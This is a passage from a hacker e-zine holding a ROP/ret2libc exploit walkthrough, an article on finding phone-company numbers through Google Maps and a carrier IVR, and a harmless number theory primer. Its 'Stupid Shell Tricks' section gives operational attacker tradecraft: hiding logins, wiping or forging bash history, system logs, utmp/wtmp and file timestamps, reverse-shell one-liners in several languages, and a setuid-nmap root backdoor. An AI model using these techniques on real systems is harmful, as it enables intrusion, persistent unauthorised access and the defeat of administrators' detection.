foo(argv[1]);
printf("Your input: %s\n", argv[1]);
}
[storm@Dysthymia audit]$ gcc example.c -o example
[storm@Dysthymia audit]$
Let's build a new template for our exploit:
AAAAAAAAAAAAAAAAAAAAAAAA [ pop eax ] [ two's complement of &system ] [ neg eax ] [ call eax ]
^ [ "/bin/bash" ]
|
overflow ("A"x24)
In earlier ret2libc exploit demonstrations, we allocated a 4-byte return-to pointer between the
return to system() and the function's argument, but since we are executing an actual call procedure
instead of returning into system(), a return-to pointer is being pushed onto the stack for us. The
next pointer immediately in our exploit string is our function argument.
In order to build our ROP chain, we'll use ROPeMe to scan the binary and generate gadgets:
[storm@Dysthymia audit]$ ropeme-bhus10/ropeme/ropshell.py
Simple ROP interactive shell: [generate, load, search] gadgets
ROPeMe> generate ./example 4
Generating gadgets for ./example with backward depth=4
It may take few minutes depends on the depth and file size...
Processing code block 1/1
Generated 87 gadgets
Dumping asm gadgets to file: example.ggt ...
OK
ROPeMe> search pop %
Searching for ROP gadget: pop % with constraints: []
0x80482e0L: pop eax ; pop ebx ; leave ;;
0x8048417L: pop eax ;;
0x80484f3L: pop ebp ; ret ; mov ebx [esp] ;;
0x80483c4L: pop ebp ;;
0x804844bL: pop ebp ;;
0x80484e8L: pop ebp ;;
0x80482e1L: pop ebx ; leave ;;
0x8048545L: pop ebx ; leave ;;
0x80483c3L: pop ebx ; pop ebp ;;
0x8048528L: pop ebx ; pop ebp ;;
0x80484e5L: pop ebx ; pop esi ; pop edi ; pop ebp ;;
0x8048544L: pop ecx ; pop ebx ; leave ;;
0x80484e7L: pop edi ; pop ebp ;;
0x80484e6L: pop esi ; pop edi ; pop ebp ;;
ROPeMe> search neg %
Searching for ROP gadget: neg % with constraints: []
0x8048449L: neg eax ; pop ebp ;;
ROPeMe> search call %
Searching for ROP gadget: call % with constraints: []
0x80483f0L: call eax ; leave ;;
0x8048543L: call far dword [ecx+0x5b] ; leave ;;
ROPeMe>
For our 'pop eax' gadget, we'll choose 0x8048417 since it's the only straightforward option. Notice
that there is also a 'pop eax; pop ebx; leave ;;' gadget located at 0x80482e0, but we want to avoid
gadgets like these if at all possible to prevent having to work around the leave instruction messing
up the stack pointer (leave in x86 means literally 'mov esp, ebp; pop ebp').
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ neg eax ] [ call eax ]
^ [ "/bin/bash" ]
|
overflow ("A"x24)
For our 'neg eax' gadget, 0x8048449 is our only option but it will work fine. We'll have to work
around the 'pop ebp' instruction by modifying our template and adding a junk pointer into the ROP
chain immediately after the pointer to the gadget. When the gadget executes, it will first negate
eax (as we want) and then pop four junk bytes to ebp, performing nothing directly useful for us but
preventing the instruction from disrupting the rest of the chain.
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ \x49\x84\x04\x08 ]
^ [ \x41\x41\x41\x41 ] [ call eax ] [ "/bin/bash" ]
| ^
overflow ("A"x24) ------ junk 4 bytes
For our 'call eax' gadget, 0x80483f0 is our only candidate but it will also work fine. We don't
have to worry about the leave instruction in this gadget since we will have already returned into
system() beforehand, so the only time it will be executed is after our dropped shell is closed. At
this point, the program will be heading towards a segfault anyways.
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ \x49\x84\x04\x08 ]
^ [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ "/bin/bash" ]
|
overflow ("A"x24)
We can calculate the two's complement (negation) of &system in gdb:
[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x8048450
(gdb) run
Starting program: /home/storm/Desktop/audit/example
Breakpoint 1, 0x08048450 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x235eb0 <__libc_system>
(gdb) p/x -0x235eb0
$2 = 0xffdca150
(gdb)
Update:
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ \x50\xa1\xdc\xff ] [ \x49\x84\x04\x08 ]
^ [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ "/bin/bash" ]
|
overflow ("A"x24)
Finding the location of "/bin/bash" should be routine by now:
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb)
And let's fill in the final part of the template:
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ \x50\xa1\xdc\xff ] [ \x49\x84\x04\x08 ]
^ [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ \x10\xf3\xff\xbf ]
|
overflow ("A"x24)
And cross our fingers:
(gdb) disas foo
Dump of assembler code for function foo:
0x080483f4 <+0>: push %ebp
0x080483f5 <+1>: mov %esp,%ebp
0x080483f7 <+3>: sub $0x28,%esp
0x080483fa <+6>: mov 0x8(%ebp),%eax
0x080483fd <+9>: mov %eax,0x4(%esp)
0x08048401 <+13>: lea -0x14(%ebp),%eax
0x08048404 <+16>: mov %eax,(%esp)
0x08048407 <+19>: call 0x8048314 <strcpy@plt>
0x0804840c <+24>: leave
0x0804840d <+25>: ret
End of assembler dump.
(gdb) delete
Delete all breakpoints? (y or n) y
(gdb) break *0x0804840d
Breakpoint 2 at 0x804840d
(gdb) run `perl -e'print "A"x24 . "\x17\x84\x04\x08" . "\x50\xa1\xdc\xff" . "\x49\x84\x04\x08" .
"\x41\x41\x41\x41" . "\xf0\x83\x04\x08" . "\x10\xf3\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x17\x84\x04\x08" .
"\x50\xa1\xdc\xff" . "\x49\x84\x04\x08" . "\x41\x41\x41\x41" . "\xf0\x83\x04\x08" .
"\x10\xf3\xff\xbf"'`
Breakpoint 2, 0x0804840d in foo ()
(gdb) x/32x $esp
0xbfffef3c: 0x08048417 0xffdca150 0x08048449 0x41414141
0xbfffef4c: 0x080483f0 0xbffff310 0x00000000 0xbfffefd8
0xbfffef5c: 0x00212e36 0x00000002 0xbffff004 0xbffff010
0xbfffef6c: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc
0xbfffef7c: 0x08048243 0x00000001 0xbfffefc0 0x001e8da7
0xbfffef8c: 0x001f9ab8 0xb7fff758 0x00381ff4 0x00000000
0xbfffef9c: 0x00000000 0xbfffefd8 0xa41d67a2 0x199850dd
0xbfffefac: 0x00000000 0x00000000 0x00000000 0x00000002
(gdb) x/i $eip
=> 0x804840d <foo+25>: ret
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x8048417 <coff+9>: pop %eax
0x8048418 <coff+10>: ret
0x8048419 <coff+11>: add %al,(%eax)
0x804841b <coff+13>: mov 0x8(%ebp),%eax
0x804841e <coff+16>: mov -0xc(%ebp),%edx
(gdb) si
0x08048418 in coff ()
(gdb) i r eax
eax 0xffdca150 -2318000
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x8048449 <tcomp+6>: neg %eax
0x804844b <tcomp+8>: pop %ebp
0x804844c <tcomp+9>: ret
0x804844d <main>: push %ebp
0x804844e <main+1>: mov %esp,%ebp
(gdb) si
0x0804844b in tcomp ()
(gdb) i r eax
eax 0x235eb0 2318000
(gdb) x/32x $esp
0xbfffef48: 0x41414141 0x080483f0 0xbffff310 0x00000000
0xbfffef58: 0xbfffefd8 0x00212e36 0x00000002 0xbffff004
0xbfffef68: 0xbffff010 0xb7fff478 0x00110414 0xffffffff
0xbfffef78: 0x001f8fbc 0x08048243 0x00000001 0xbfffefc0
0xbfffef88: 0x001e8da7 0x001f9ab8 0xb7fff758 0x00381ff4
0xbfffef98: 0x00000000 0x00000000 0xbfffefd8 0xa41d67a2
0xbfffefa8: 0x199850dd 0x00000000 0x00000000 0x00000000
0xbfffefb8: 0x00000002 0x08048340 0x00000000 0x001ef420
(gdb) si
0x0804844c in tcomp ()
(gdb) i r ebp
ebp 0x41414141 0x41414141
(gdb) x/5i $eip
=> 0x804844c <tcomp+9>: ret
0x804844d <main>: push %ebp
0x804844e <main+1>: mov %esp,%ebp
0x8048450 <main+3>: and $0xfffffff0,%esp
0x8048453 <main+6>: sub $0x10,%esp
(gdb) x/32x $esp
0xbfffef4c: 0x080483f0 0xbffff310 0x00000000 0xbfffefd8
0xbfffef5c: 0x00212e36 0x00000002 0xbffff004 0xbffff010
0xbfffef6c: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc
0xbfffef7c: 0x08048243 0x00000001 0xbfffefc0 0x001e8da7
0xbfffef8c: 0x001f9ab8 0xb7fff758 0x00381ff4 0x00000000
0xbfffef9c: 0x00000000 0xbfffefd8 0xa41d67a2 0x199850dd
0xbfffefac: 0x00000000 0x00000000 0x00000000 0x00000002
0xbfffefbc: 0x08048340 0x00000000 0x001ef420 0x00212d5b
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x80483f0 <frame_dummy+32>: call *%eax
0x80483f2 <frame_dummy+34>: leave
0x80483f3 <frame_dummy+35>: ret
0x80483f4 <foo>: push %ebp
0x80483f5 <foo+1>: mov %esp,%ebp
(gdb) si
__libc_system (line=0xbffff310 "/bin/bash") at ../sysdeps/posix/system.c:179
179 {
(gdb) c
Continuing.
Detaching after fork from child process 16945.
[storm@Dysthymia audit]$ echo ROP til you drop
ROP til you drop
[storm@Dysthymia audit]$
VIII. References and Further Reading
====================================
[1] http://sickness.tor.hu/?p=374
[2] http://sickness.tor.hu/?p=378
[3] http://www.technovelty.org/linux/pltgot.html
[4] http://www.ibm.com/developerworks/linux/library/l-sp4/index.html
[5] http://www.phrack.org/issues.html?issue=58&id=4
Special thanks to corelanc0d3r, phetips, and zx2c4 for their review and suggestions
[==================================================================================================]
-=[ 0x07 A New Kind of Google Mining
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com
There are two kinds of CEOs in this world: those who take advantage of every resource they possibly
can, and pussies. Our arrest at a Communications Fraud Control Association convention suggests
there's more of the latter than we thought, so there seemed no better time than now to help fellow
corporate overlords expand their ruthlessness.
There are times when scanning can flat out suck - we'll be the first to admit it. There's no better
way to kill your initiative than to go through a range filled with numbers that just ring or put you
on the phone with bewildered subscribers. If you're just looking for an interesting way to kill some
time, there's a much easier way. Here to give you a hand is a tool you'd never expect; Google Maps.
For example, let's do a search for AT&T in Terre Haute, Indiana. Keeping in mind that all the AT&T
results that are legitimately cell phone stores have the AT&T logo by them, let's pick the first one
that doesn't; 812-235-0096. What we got wasn't a bad start at all.
"You've reached AT&T in Terre Haute, Indiana. This is an unmanned site. Please leave a message after
the tone or if you need immediate assistance, contact the on-site workforce."
While it's noteworthy that the mailbox in question is on a Nortel PBX, the configuration is pretty
well locked down. So to even the odds out a little, we'll throw out another nifty technique - this
time an IVR made by Verizon shortly before the Frontier buyout of several states. The CLEC
maintenance center is pretty much what it sounds like: an IVR for switchless resellers to help test
customer lines and create trouble reports. Give it a try: (877) 503-8260. Right away, you'll be
asked for the OCN of the company you work for. Type in 0772; this goes for all unported Verizon or
Frontier lines in ex-GTE states. Select the all other category, the state of Indiana, and give it
the number to the AT&T PBX.
Once it looks up the account number, you'll be greeted with four options:
Press one for 812-235-0096
Press two for 812-235-0575
Press three for 812-235-4781
Press four for 812-235-5087
These all correspond to numbers associated with that same account. So not a bad way to find a few
interesting numbers, right? Here's a few other nice things we found.
207-693-9920 - Sensaphone (searched for Fairpoint in Portland, ME)
406-495-1408 - Weird ANAC, test command 7 is non-functioning ringback (searched for Qwest
Communications in Helena, MT)
304-263-2510 - Verizon Potomac Assignment Provisioning Center number changed recording (Searched for
C&P Telco in Martinsburg, WV)
That last listing brings us to two final points; first of all, type slowly - the auto-suggest
feature is a better friend then you might think. Second, sometimes the best way to search is to use
the names of phone companies that don't exist anymore - or just aren't generally used to do business
with the public. For example, C&P Telephone hasn't existed since the Bell System breakup. MCI is
another good one, but there's also quite a few numbers that ring out, so it can be a little tedious.
We personally like AT&T best, since they constantly feel the need to share their more interesting
internal numbers.
So like the article itself, this technique probably isn't for anybody wanting a long-term project;
but if you want something instantly - whether it be excitement, lulz, or puzzling contraptions to
cut your teeth with, just add water.
As always, keep it evil, keep it shady, keep it ruthless.
[==================================================================================================]
-=[ 0x08 Stupid Shell Tricks
-=[ Author: teh crew
Logging into SSH and interacting with a shell is probably necessary at one point or another in one's
hacking career. We've compiled a list of tips and tricks from various individuals in the community
that may prove helpful next time you're looking to to avoid detection and cover your tracks on a
system.
-----
The common way to list logged-in users has always been the `w` command. First read in article 0x04
of Phrack #64, the -T flag in ssh can be used to not allocate a tty upon login, preventing the user
from being listed in `w` output:
ssh -T storm@gonullyourself.org
This obviously leaves you with a blank prompt, so it's not a bad idea to simulate one:
ssh -T storm@gonullyourself.org bash -i
For those who care, we can prevent logging the remote host's information to known_hosts through:
ssh -T -o UserKnownHostsFile=/dev/null storm@gonullyourself.org bash -i
Not having a tty causes some predictable issues with certain programs. Utilities like `man` and
`less` will print out data in its entirety instead of fitting it to the terminal and providing
scrollability. `screen` will flat-out refuse to work:
[storm@mania ~]$ screen
Must be connected to a terminal.
Fortunately, we can fake a tty using Python which gives us somewhat broken support for some of the
utilities we want to use:
[storm@mania ~]$ python -c 'import pty;pty.spawn("/bin/sh")'
sh-3.2$ perl -e'print "$_\n" for ( 1 .. 20 )' > /tmp/count
perl -e'print "$_\n" for ( 1 .. 20 )' > /tmp/count
sh-3.2$ less /tmp/count
less /tmp/count
WARNING: terminal is not fully functional
/tmp/count (press RETURN)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/tmp/count
18
:
19
:
20
(END) q
sh-3.2$
Commands like `ps aux` that output long lines of text will be truncated at 80 characters, but this
can be overcome with a pipe to `cat`:
sh-3.2$ ps aux | cat
Ensure to kill the python process upon disconnecting, or the process may remain open and spike the
CPU load.
-----
Once logged into a host, it's common practice to disable logging mechanisms. Bash uses environment
variables to control that session's logging behavior. Note that the shell log is only recorded to
file upon exiting the shell, so one may manipulate the environment variables at any time. Any of
the following commands will prevent Bash from writing the session log to .bash_history:
[storm@mania ~]$ unset HISTFILE
[storm@mania ~]$ export HISTFILE=
[storm@mania ~]$ export HISTFILE=/dev/null
[storm@mania ~]$ export HISTSIZE=0
[storm@mania ~]$ export HISTFILESIZE=0
[storm@mania ~]$ export HISTIGNORE=*
[storm@mania ~]$ export HISTCONTROL=ignorespace # all commands prefixed with
# a space will be ignored
The last two commands will write the command itself to .bash_history but nothing after it.
Should the environment variables above be marked read-only, there are a few more intrusive options
still available:
[storm@mania ~]$ history -c
[storm@mania ~]$ ln -fs /dev/null .bash_history
[storm@mania ~]$ rm .bash_history && mkdir .bash_history
System logs are just as important to consider as user logs, but require root access to manipulate.
A quick and dirty (and VERY intrusive and VERY discoverable) way of killing system logging on a box
is to simply symlink everything to /dev/null:
[root@mania ~]# find /var/log -exec ln -fs /dev/null {} \;
The wiser thing would be to search pertinent log files manually (or with `sed`) and remove any
entries related to your activities. Common log paths are:
/var/log/messages*
/var/log/secure*
/var/log/audit*
/var/log/auth*
In addition, Linux records logins and miscellaneous user data to various other files as well. Since
these files use specific data structures to store data instead of plaintext entries with newlines,
they are commonly just deleted, despite being instrusive.
/var/log/btmp
/var/log/wtmp
/var/log/lastlog
/var/run/utmp
Utilities like `w`, `who`, `last`, `lastb`, and `lastlog` pull their data from these files.
As always, every action has a reaction, and care must be taken even when simply trashing log files.
An extra step may mean the difference between an administrator shrugging off an anomaly and being
fully alerted of compromise.
[root@mania ~]# rm -f /var/log/wtmp
[root@mania ~]# last
last: /var/log/wtmp: No such file or directory
Perhaps this file was removed by the operator to prevent logging last info.
[root@mania ~]# touch /var/log/wtmp
[root@mania ~]# last
wtmp begins Mon Nov 21 20:58:36 2011
[root@mania ~]#
It is actually fairly trivial to tamper with the contents of these files to hide your tracks instead
of full-out deleting everything. A simple `sed` is our friend here, where we can replace our IP
address with any string so long as it's the same length:
[root@mania ~]# w
22:28:03 up 79 days, 4:35, 1 user, load average: 0.06, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
storm ttyp0 111.22.333.444 22:22 0.00s 0.05s 0.01s sshd: storm [priv]
[root@mania ~]# sed -i 's/111.22.333.444/8============D/g' /var/run/utmp
[root@mania ~]# w
22:28:36 up 79 days, 4:36, 1 user, load average: 0.03, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
storm ttyp0 8============D 22:22 0.00s 0.06s 0.01s sshd: storm [priv]
Awwwww yeahhhhhh.
Also be mindful of applications that have their own logging mechanisms, like Apache, MySQL, or
Pure-FTPd. Most applications will log to /var/log by standard, but checking the running processes
(`ps aux`) for weird applications that may not follow this same practice is always a good idea.
Datacenters with a large number of servers to manage may also employ centralized logging software
that redirects log entries to a different server as soon as they are generated. If this is the
case, then research should be done on the software itself to see how it should be temporarily
disabled or modified to hide tracks. Once the entries are generated, however, they're gone, unless
the logging server is compromised. Have fun.
When modifying any file that may be under close scrutiny by an administrator, always be sure to
change the timestamps back to their original values with `touch` to prevent suspicion from arising.
Below is an example of changing a file's access and modification times to February 15, 2011 3:23:51:
[storm@mania ~]$ touch test.log
[storm@mania ~]$ stat test.log
File: `test.log'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: 9026h/36902d Inode: 103219222 Links: 1
Access: (0664/-rw-rw-r--) Uid: ( 500/ storm) Gid: ( 500/ storm)
Access: 2011-09-09 19:45:44.000000000 -0700
Modify: 2011-09-09 19:45:44.000000000 -0700
Change: 2011-09-09 19:45:44.000000000 -0700
[storm@mania ~]$ touch -t 201102150323.51 test.log
[storm@mania ~]$ stat test.log
File: `test.log'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: 9026h/36902d Inode: 103219222 Links: 1
Access: (0664/-rw-rw-r--) Uid: ( 500/ storm) Gid: ( 500/ storm)
Access: 2011-02-15 03:23:51.000000000 -0800
Modify: 2011-02-15 03:23:51.000000000 -0800
Change: 2011-09-09 19:47:37.000000000 -0700
[storm@mania ~]$ ls -l test.log
-rw-rw-r-- 1 storm storm 0 Feb 15 2011 test.log
[storm@mania ~]$
Note that while you can tamper with the Access and Modify timestamps, the GNU coreutils manual
states that the Change time (called the file's ctime field) cannot be tampered with.
Oh, wait. Yes it can.
By changing the system time, immediately `touch`ing the file, and then changing the system time back
to normal, you can trick the ctime value to any timestamp you'd like. Unfortunately, this technique
doesn't work on most VPSes since the time is permanently synchronized with the hardware clock.
[root@Dysthymia ~]# date -s "2011-02-15 03:23:51"; touch test.log
Tue Feb 15 03:23:51 EST 2011
[root@Dysthymia ~]# stat test.log
File: `test.log'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 98059 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2011-02-15 03:23:51.001999960 -0500
Modify: 2011-02-15 03:23:51.001999960 -0500
Change: 2011-02-15 03:23:51.001999960 -0500
Woot. We can determine whether this is possible or not beforehand by looking at the output of
`hwclock`:
[root@mania storm]# hwclock --show
Cannot access the Hardware Clock via any known method.
Use the --debug option to see the details of our search for an access method.
A physical server would print out the current time, so this is obviously not a good sign.
-----
For one reason or another, you may want to spawn a reverse shell. There are many ways to do this,
but we've included a few one-liners that don't require uploading extra tools to do (it is assumed
here that the host receiving the connection has the IP address 10.0.0.1). These examples were
copied/pasted from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, but we
felt they were too useful to not include:
Bash
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");
open(STDERR,">&S");exec("/bin/sh -i");};'
Python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
$ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
# Assuming that the TCP connection uses file descriptor 3
Ruby
$ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
To spawn a reverse shell by means of xterm, the following command should be run on the target host:
$ xterm -display 10.0.0.1:1
while the commands here are run on the receiving host:
$ Xnest :1
$ xhost +targetip
It is also very classic to spawn a shell using netcat:
$ nc -e /bin/sh 10.0.0.1 1234
However, some versions of netcat do not support the -e flag, in which case the following command may
be used instead:
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
-----
Once you gain root, you probably want to keep it. One doesn't always have the time or patience to
install a rootkit, so crude backdoors are chosen instead. These quick solutions are usually
giant balls of suck, like adding a second root user. Why not use nmap as a backdoor?
Nmap has a little-known feature called interactive mode, which grants the ability to not only
perform port scans without broadcasting your parameters to everyone logged into the system, but also
to execute shell commands. Let's take a look at the nmap manpage:
--interactive (Start in interactive mode) .
Starts Nmap in interactive mode, which offers an interactive Nmap
prompt allowing easy launching of multiple scans (either
synchronously or in the background). This is useful for people who
scan from multi-user systems as they often want to test their
security without letting everyone else on the system know exactly
which systems they are scanning. Use --interactive to activate this
mode and then type h for help. This option is rarely used because
proper shells are usually more familiar and feature-complete. This
option includes a bang (!) operator for executing shell commands,
which is one of many reasons not to install Nmap setuid root..
Of course, we're not going to listen to their advice.
root@Wakari:~# chmod u+s /usr/bin/nmap
root@Wakari:~# logout
storm@Wakari:~$ nmap --interactive
Starting Nmap V. 5.21 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami
root
This plants an easily accessible root shell on the system without creating too much noise. Should
the setuid bit ever be discovered, inexperienced administrators will probably overlook this detail
simply because it would be somewhat logical for nmap to be installed this way to perform its packet-
fu (of course, discounting security). Maybe you'll come across a box with an administrator that
thinks the same way too.
-----
If you have any stupid (or leet, we don't judge) shell tricks you'd like to share, send them in to
zine@gonullyourself.org and we'll try to compile a part two if there's enough interest.
[==================================================================================================]
-=[ 0x09 An Introduction to Number Theory
-=[ Author: dan
-=[ IRC: irc.gonullyourself.org #gny
Mathematics blends well with computation. To shamelessly steal from the authors of the classic
programming book "Structure and Interpretation of Computer Programs," mathematics explains "what is"
while computation explains "how to." To quote the equally authoritative television show "Married
with Children," you can't have one without the other.
The following paragraph is titled "How to Piss Off Every Mathematician in the World."
I will not be including any proofs in this article. Since most mathematicians will scorn this, I
feel the need to give a small defense of my choice. First, this article doesn't cover any advanced
topic, and proofs for any theorems given are easily accessible on the internet. Secondly, I feel it
will take away from this article, reading mathematics is not like reading other works, and those
with less experience with mathematics will read this article in one linear scan (not the best way).
If this was full of tedious proofs they didn't care about they probably wouldn't make it to the end
of the article, or enjoy themselves very much.
When I present theorems, I will do so without proof. For the programmers out there, this is like
giving you the API without the source. You can do all kinds of neat stuff with the API (assuming it
works as advertised), but you don't really know what's going on. If you're interested in learning
more about the theorems, feel free to look them up on your own.
Number Theory is the study of numbers. Yeah, the study of numbers. You might be thinking that is
the definition of mathematics as a whole, but it's really not. Several areas of mathematics aren't
really about the study of numbers, even though numbers might be a great way to explore those
different topics. For example arithmetic, is the study of quantity, not numbers, but quantity is
easily described using numbers. Modern Algebra is the study of abstract structures, which often use
integers, and real numbers for different examples, but that is not the main purpose of Modern
Algebra.
Number Theory is the study of numbers. I recently read a book where the author abused the word
"sexy" a lot. So, I plan to do the same. Number Theory is misconceived by many people as being one
of the sexier areas of mathematics. Number Theory is not sexy, but it is fun. Part of why it's fun
is because a lot of the topics can be described in simple terms that many of us learned at a young
age. Since Number Theory is about numbers, rather than a more general topic, a lot of times people
new to the subject can find the books random, or they seem to jump around. This article will seem
that way as well, since it's designed mainly as an overview. The goal is to cover properties of
numbers that, through the centuries, have been deemed important and interesting.
Number Theory for a long time was known as being one of the least applicable areas of mathematics to
the real world. This started to change when applications were found in cryptography. This is when
Number Theory quit being fun and started being sexy. It's time to start making number theory fun
again.
Natural Numbers: Depending on what book you read, Natural Numbers either start with 0, or 1. Yeah,
mathematics, the most rigorous of all disciplines can't really decide if 0 is a natural number or
not. To be quite honest we should just get some international organization together to vote and
decide if Pluto is a planet or not, I mean if 0 is a natural number. Most books related to
programming will include 0 in the natural numbers, because it goes along well with indexing arrays
starting at 0, and so on. Most number theory books (at least the ones I've seen) start the natural
numbers at 1. So, since the people who devoted their lives to studying numbers seem to think 1 is
the first natural number, I'm going to go with their definition.
Natural Numbers: 1,2,3,4,5,6,7,...
Integers: ...,-7,-6,-5,-4,-3,-2,-1,0,1,2,3,4,5,6,7...
Now, let's take a brief tour of Number Theory.
The first thing we need to learn about is the "Fundamental Theorem of Arithmetic"
Protip: if something is called "fundamental theorem of..." it's really fucking important
The way to describe "FTA" in English: Every natural number greater than 1 can be represented as the
multiplication of prime numbers, or is a prime number.
Prime Number: a natural number, 2 or greater, that is only divisible by 1 and itself.
Notice a prime number must be 2 or greater. A mistake many beginners make is assuming that 1 is a
prime number. It's not, by definition.
Continuing on, the fundamental theorem of arithmetic is what gives us the power to play with numbers
in a lot of interesting ways. For example, we can now explore the divisibility of the natural
numbers.
People who study number theory often times talk about division and divisibility so much that they
came up with their own special notation.
a|b, read as "a divides b" means that b = a*k, where k is some integer.
Examples: 2|6 since 6 = 2*3, (in this example k = 3)
5|10 since 10 = 5*2 (k = 2)
When I see these I always read them as a "is a factor of" to keep it straight in my head.
a|b a "is a factor of" b
2|6 2 "is a factor of" 6
5|10 5 "is a factor of" 10
Remember, number theory is the study of numbers. So we're interested in questions about numbers,
questions like, which numbers divide which other numbers? What's the biggest divisor a number has?
Is there anything special about numbers that share divisors?
One of the most more popular things to do with divisors is to find two numbers greatest common
divisors.
Greatest Common Divisor: the greatest, common, divisor two numbers have.
It's hard to get a more descriptive name than that.
Let's do this by hand once, consider 5 and 10.
1|5 since 5 = 1 * 5
not true: 2|5 since 5 = 2*k, solve for k, and you get k = 5/2 =2.5 not an integer
not true 3|5 ...
not true 4|5 ...
true 5|5 since 5 = 5 * 1
1|10 since 10 = 1 * 10
2|10 since 10 = 2 * 5
not true: 3|10 ...
not true: 4|10 ...
5|10 since 10 = 5 * 2
not true: 6|10 ...
not true 7|10 ...
not true 8|10 ...
not true 9|10 ...
10|10 since 10 = 10 * 1
So they have the following divisors in common, 1, and 5.
5 is the biggest one, so the greatest common divisor of 5 and 10 is 5.
This is often written in one of two forms gcd(5,10) = 5, or just (5, 10) = 1 (we'll avoid the second
form since it can confuse people into thinking of points.
Euclid's Algorithm is very special, it's considered one of the oldest algorithms still in common
use. Euclid's algorithm computes the gcd of two numbers very quickly. But, since I'm not doing
proofs, or explaining the "how to" part of things. I'm going to leave this out.
You might of noticed something from the above examples of finding all the divisors that we did. It
seems that every number is divisible by 1, we didn't prove this (because we're not proving stuff),
but it's true. As a result no matter what two natural numbers you get, they'll always have a
greatest common divisor, but it might just be 1.
When two numbers have a greatest common divisor of 1 we say that they are relatively prime (also
called coprime).
gcd(4, 7) = 1, so relatively prime
gcd(10, 9) = 1, relatively prime
This leads to another question that number theorist for some reason find interesting, given a
number, how many numbers less than it are relatively prime to it?
There's actually a function for this, it's called Euler's Phi function (\phi in LaTeX), that you
might recognize from the article on RSA from the last issue of GNY.
Let's try it out, let's take 6 as an example.
What's \phi(6)?
Well,
gcd(1, 6) = 1 relatively prime!
gcd(2, 6) = 2
gcd(3, 6) = 3
gcd(4, 6) = 2
gcd(5, 6) = 1 relatively prime!
gcd(6, 6) = 6
so \phi(6) = 2
So, I should mention that Euler's Phi function is also sometimes referred to as the Euler's Totient
function. I mention this, because I'm getting sick of doing everything by hand, so I'm going to
start using the computer algebra system known as maxima (http://maxima.sourceforge.net).
(%i1) totient(2);
(%o1) 1
(%i2) totient(3);
(%o2) 2
(%i3) totient(5);
(%o3) 4
(%i4) totient(29);
(%o4) 28
(%i5) totient(113);
(%o5) 112
There's something interesting here. Whenever we look at the \phi(k), where k is prime, the answer
is k - 1. I won't explain this, but try to prove it to yourself, think about the definition of
Euler's Phi function and why primes would do this.
Fermat's Little Theorem: If p is prime, then p|n^p - n, where n is an integer.
Probably the most interesting thing about Fermat's Little Theorem from a pure number theory point of
view is the proof, so I suggest you go off and read several of them. :)
To the people who are interested in studying the sexy side of number theory, Fermat's Little Theorem
is the equivalent of the Little Black Dress (heh they both have "little" in the names, clever).
Not purely number theory, but with this theorem and some statistics you can pick very large numbers
and figure out with with a high level of accuracy if they're prime or not. Of course it's possible to
test if a number is prime or not with 100% accuracy, but this is slow. Using Fermat's Little
Theorem to test for "primality" takes us slightly off course of pure number theory, but here's a
rough idea of how it works.
Suppose we want to test if 23 is prime. Pick a random number between 1 and 22.
(%i10) random(23);
(%o10) 7
Now check it with Fermat's Little Theorem
(%i12) 7^23-7;
(%o12) 27368747340080916336
(%i14) 27368747340080916336/23;
(%o14) 1189945536525257232
We got an integer back, so for n = 7, p = 23 Fermat's little Theorem holds.
Now you just repeat this process, every time the test is successful the odds of 23 being a prime
goes up. There are some numbers which can fool Fermat's Primality Test, these are called Carmichael
Numbers.
Remainders: Kinda not just for elementary school.
Programmers are probably already familiar with the mod operation (usually '%') for finding the
remainder of two numbers.
30/11 = 2 remainder 8
With integer division used in most programming languages, we'd get:
30/11 = 2
